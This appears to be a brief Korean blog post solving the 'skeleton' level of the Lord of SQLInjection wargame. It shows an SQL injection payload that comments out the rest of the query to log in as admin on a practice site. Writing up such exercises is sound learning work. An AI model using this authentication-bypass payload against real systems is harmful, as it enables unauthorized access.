-
[LOS] skeletonWargame/Lord of SQLInjection 2019. 7. 5. 01:05
[skeleton] https://los.rubiya.kr/chall/skeleton_a857a5ab24431d6fb4a00577dac0f39c.php
'가 필터링되어 있지 않다..!
그냥 뒤에 and 1=0이 추가되었을 뿐이다.
이건 간단하게 주석처리하면 문제가 풀릴 것 같다.
?pw=' or id='admin'%23
간단하게 클리어~
'Wargame > Lord of SQLInjection' 카테고리의 다른 글
[LOS] darkknight (0) 2019.07.05 [LOS] golem (0) 2019.07.05 [LOS] vampire (0) 2019.07.05 [LOS] troll (0) 2019.07.05 [LOS] orge (0) 2019.07.05 댓글